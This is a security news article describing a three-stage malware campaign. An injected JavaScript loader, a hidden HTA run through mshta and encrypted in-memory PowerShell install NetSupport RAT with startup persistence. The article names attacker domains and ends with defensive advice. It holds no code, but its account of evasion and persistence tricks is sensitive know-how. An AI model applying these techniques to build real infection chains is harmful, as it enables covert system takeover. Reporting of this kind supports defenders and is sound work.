New Multi-stage JS#SMUGGLER Malware Attack Delivers ‘NetSupport RAT’ to Gain Full System Control

A new malware campaign using multiple attack stages has been discovered that delivers NetSupport RAT through hidden web-based redirects and obfuscated code.

The attack unfolds in three stages, starting with a JavaScript loader injected into compromised websites.

This first stage downloads a stealthy HTA file that runs encrypted PowerShell commands using mshta.exe. The final stage then downloads and installs a remote access tool that gives attackers complete control over victim computers.

The attack chain employs advanced techniques to evade detection by security software.

Securonix security researchers identified this campaign and found that it uses multiple layers of obfuscation, including numeric index mapping and rotating arrays to hide malicious code.

The campaign also checks the device type the victim is using and delivers different payloads to mobile versus desktop users. The researchers noted that the malware framework appears to be actively maintained and optimized for staying hidden on infected systems.

Once the JavaScript loader runs in the victim’s browser, it quietly sets up rotating arrays of scrambled text and waits for the webpage to load fully.

It then checks the device type, and either creates a full-screen, hidden iframe for mobile devices or loads a remote script for desktop systems.

The loader also uses the browser’s local storage to track whether it has already infected that system, ensuring it only runs once to reduce the chances of being detected.

This careful approach allows attackers to build malicious web addresses on the fly and fetch the next stage of the attack from domains they control, such as stoneandjon.com and boriver.com.

Attack Chain and Infection Mechanism

The second stage arrives as an HTML Application file that runs through mshta.exe, a legitimate Windows program that attackers often abuse.

This HTA file runs completely hidden from view, writing an encrypted PowerShell script to the computer’s temporary folder.

The script uses AES-256-ECB encryption, Base64 encoding, and GZIP compression to mask its true purpose.

Once the layers of encryption are removed, the payload executes directly in the computer’s memory without writing files to disk.

This technique makes it much harder for antivirus programs to detect the malware, as there are no suspicious files to scan.

After execution, the script removes its temporary files to hide evidence of the attack.

The final PowerShell payload downloads a ZIP file containing NetSupport RAT components from an attacker-controlled server at kindstki.com.

After downloading the archive, the script extracts it into a folder named CommunicationLayer under ProgramData, a location that looks innocent and blends in with legitimate applications.

The malware launches the extracted client32.exe file using a hidden JScript wrapper to disguise the execution chain.

To maintain long-term access, it creates a shortcut file called WindowsUpdate.lnk in the Startup folder.

This shortcut ensures the remote access tool launches automatically whenever the victim logs in to their computer, giving attackers persistent control.

NetSupport RAT provides complete remote access to the infected system, including desktop control, file operations, command execution, data theft, and tunneling.

The malware avoids requiring administrator privileges by installing at the user level and using deceptive naming to blend in with legitimate Windows components.

Organizations should strengthen their defenses by blocking untrusted scripts, enabling PowerShell logging, restricting mshta.exe execution, and deploying behavioral detection tools that can identify suspicious process chains and fileless execution techniques.

Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.